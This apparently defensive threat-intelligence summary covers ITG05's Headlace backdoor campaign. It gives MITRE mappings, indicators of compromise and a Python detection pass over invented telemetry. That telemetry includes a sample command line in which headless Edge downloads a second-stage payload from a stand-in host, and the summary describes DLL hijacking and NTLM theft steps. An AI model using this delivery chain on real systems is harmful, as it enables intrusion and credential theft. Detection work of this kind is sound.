Threat intelligence from X-Force details ITG05’s use of the Israel-Hamas conflict as lure material to deliver the Headlace backdoor across at least 13 countries, leveraging official documents and decoys. The malware chain comprises a dropper, a VBScript launcher, and a headless MS Edge component that downloads secondary payloads and can exfiltrate credentials. #Headlace #ITG05 #APT28 #RazumkovCentre #BankofIsrael #UNHumanRightsCouncil
Key points
- ITG05’s operation marks the first known use of the Israel-Hamas conflict to deliver the Headlace backdoor.
- The campaign targets multiple institutions via lures tied to the United Nations, Bank of Israel, CRS, European Parliament, Razumkov Centre, and an Azerbaijan-Belarus commission.
- X-Force observed Headlace deployments targeting at least 13 nations, with geolocation perimeters highlighting UNHRC member states.
- Lures include .RAR archives exploiting CVE-2023-38831 and DLL-hijacking techniques to run Headlace.
- Headlace is multi-component: a .CMD dropper, a .VBS launcher, and a backdoor that uses MS Edge in headless mode to fetch secondary payloads, likely for credential exfiltration.
- The infection chain involves abusing commercial hosting (Mockbin/Mocky/infinityfreeapp), browser checks via ipapi.co, and multiple delivery steps before payload execution.
- Execution chains include WinRAR exploitation, DLL hijacking, and direct execution masquerading as Windows updates; post-foothold activity focuses on credential theft and exfiltration.
MITRE Techniques
- [T1566.002] Spearphishing Link – Phishing emails with URLs leading to malicious archives; “The phishing URL would contain a unique hardcoded URL parameter ‘id’. This ID is necessary to be able to download the lure archive as well as Headlace’s secondary payloads and likely allows ITG05 to track infections through all stages.”
- [T1105] Ingress Tool Transfer – Downloading secondary payloads from a second download site after the initial dropper; “The backdoor uses a second download site to stage secondary payloads.”
- [T1059.005] VBScript – VBScript launcher used to execute the BAT file; “The .VBS launcher uses the Wscript.Shell object to execute the .BAT file.”
- [T1574.001] DLL Search Order Hijacking – DLL hijacking used to run the Headlace payload; “The DLL-hijacking chain involves delivering a legitimate Microsoft Calc.exe binary that is susceptible to DLL-hijacking… The DLL’s main function was overwritten to execute the hidden .CMD file that is the Headlace payload.”
- [T1036] Masquerading – Disguising the dropper as a Windows update script; “In this chain, the threat actor directs the victim to execute the Headlace CMD dropper directly by disguising it as a Windows update script and reporting fake update status messages in the console.”
- [T1027] Obfuscated/Compressed Files and Information – Use of hidden/obfuscated content within a ZIP; “the malicious ZIP file would contain several hidden files and only one visible executable, with a long whitespace-padded filename, in order to hide the extension.”
- [T1003.001] NTLM Credential Dumping – Capturing credentials and attempting exfiltration; “to capture NTLM credentials or SMB hashes of user accounts and attempt to exfiltrate them via the TOR network.”
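The techniques above describe a chain with several observable seams: a whitespace-padded filename that hides the real extension, a VBScript launcher handing off to a .BAT file, Edge started in headless mode by a script host, and a legitimate Calc.exe loading a DLL from its own non-Windows directory. The following detection pass is an added example written for this summary, not code from X-Force or from the report; the Sysmon-style event fields, the whitespace threshold, the sample paths and the `sideloaded.dll` name are constructed assumptions, and the `--headless` switch is a genuine Chromium/Edge command-line flag.

```python
"""Toy detection pass over constructed process-creation and image-load events
modelled on the Headlace execution chain. All sample data below is invented."""
import re
from dataclasses import dataclass

# Shells and script hosts that act as parents in the CMD -> VBS -> BAT chain.
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe"}
# A name with a long run of spaces before the real extension (T1027 padding).
# Eight spaces is an assumed threshold; tune it to your telemetry.
PADDED_NAME = re.compile(r"\S\s{8,}\.(exe|cmd|bat|vbs|scr)$", re.IGNORECASE)


@dataclass
class Event:
    kind: str            # "process" (creation) or "imageload"
    image: str           # full path of the created / loading process
    parent: str = ""     # parent process name, process events only
    cmdline: str = ""    # command line, process events only
    loaded: str = ""     # module path, imageload events only


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def dirname(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[0].lower()


def check_headless_edge(ev: Event):
    """Headless Edge launched from a shell or script host (secondary download)."""
    if ev.kind != "process" or basename(ev.image).lower() != "msedge.exe":
        return None
    if "--headless" in ev.cmdline.lower() and ev.parent.lower() in SCRIPT_HOSTS:
        return f"headless msedge spawned by {ev.parent}"
    return None


def check_script_chain(ev: Event):
    """VBS launcher (wscript.exe) starting cmd.exe with a .bat argument."""
    if ev.kind != "process" or ev.parent.lower() != "wscript.exe":
        return None
    if basename(ev.image).lower() == "cmd.exe" and re.search(r"\.bat\b", ev.cmdline, re.I):
        return "wscript.exe launched cmd.exe with a .bat argument"
    return None


def check_padded_filename(ev: Event):
    """Executable whose name hides its extension behind a run of spaces."""
    if ev.kind == "process" and PADDED_NAME.search(basename(ev.image)):
        return "whitespace-padded filename hides executable extension"
    return None


def check_calc_dll_hijack(ev: Event):
    """Legitimate calc.exe loading a DLL from its own non-Windows directory."""
    if ev.kind != "imageload" or basename(ev.image).lower() != "calc.exe":
        return None
    if dirname(ev.loaded) == dirname(ev.image) and not dirname(ev.loaded).startswith("c:\\windows\\"):
        return f"calc.exe side-loaded {basename(ev.loaded)} from {dirname(ev.loaded)}"
    return None


CHECKS = (check_headless_edge, check_script_chain, check_padded_filename, check_calc_dll_hijack)


def run_detections(events):
    """Return (event index, message) for every event that trips a check."""
    hits = []
    for i, ev in enumerate(events):
        for check in CHECKS:
            msg = check(ev)
            if msg:
                hits.append((i, msg))
    return hits


# Constructed sample telemetry: four malicious-looking events, two benign ones.
SAMPLE_EVENTS = [
    Event("process", r"C:\Users\u\Downloads\roadmap.pdf                .exe", parent="explorer.exe"),
    Event("process", r"C:\Windows\System32\cmd.exe", parent="wscript.exe",
          cmdline=r'cmd.exe /c "C:\Users\u\AppData\Local\Temp\run.bat"'),
    Event("process", r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe", parent="cmd.exe",
          cmdline="msedge.exe --headless --disable-gpu https://hosting.example/execdwn.php?id=CONSTRUCTED"),
    Event("process", r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe", parent="explorer.exe",
          cmdline="msedge.exe https://www.msn.com"),
    Event("imageload", r"C:\Users\u\Downloads\calc.exe", loaded=r"C:\Users\u\Downloads\sideloaded.dll"),
    Event("imageload", r"C:\Windows\System32\calc.exe", loaded=r"C:\Windows\System32\kernel32.dll"),
]

if __name__ == "__main__":
    for idx, message in run_detections(SAMPLE_EVENTS):
        print(f"event {idx}: {message}")
```

Each check is deliberately narrow so that it can be mapped back to one of the techniques listed above; in a real pipeline the interactive Edge launch and the System32 calc.exe load stay silent, as they do here, while the four chain stages each produce a separate alert that can be correlated by host.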
Indicators of Compromise
- [Domain] mockbin.com – hosting malicious archives used in spearphishing campaigns via Mockbin services.
- [Domain] mocky.io – another hosting service used to stage lure payloads.
- [Domain] infinityfreeapp.com – legitimate hosting used to deliver malicious payloads.
- [URL] https://ipapi.co/json – browser/geolocation check prior to payload delivery.
- [File Name] SEDE-PV-2023-10-09-1_EN.docx – lure document tied to European Parliament materials.
- [File Name] war.docx – lure document containing UN-related content.
- [File Name] roadm ap.docx/Roadmap.docx – lure document linked to Belarus-Azerbaijan cooperation.
- [File Name] 2023-12-bois-position-on-accessing-capital-pr.docx – lure referencing Bank of Israel press release.
- [File Name] IN11897.pdf – lure referencing CRS update on Ukraine/EU policy.
- [File Name] filedwn.php – part of the download chain for lure payloads.
- [File Name] execdwn.php – part of the second-stage payload download chain.
- [File Type] .RAR – archive format used to deliver the initial lure; “lure documents contained in a .RAR archive.”
- [File Type] .CMD – dropper and command scripts used in multiple execution chains.
- [File Type] .VBS – launcher script for the backdoor.
- [File Type] .BAT – backdoor component invoked by the launcher.
- [File] Headlace – name of the backdoor involved in infection chains.
- [URL] www.msn.com – victim redirect after lure download during infection flow.
- [Process] msedge – headless browser process used to download secondary payloads (evidence of headless browser usage).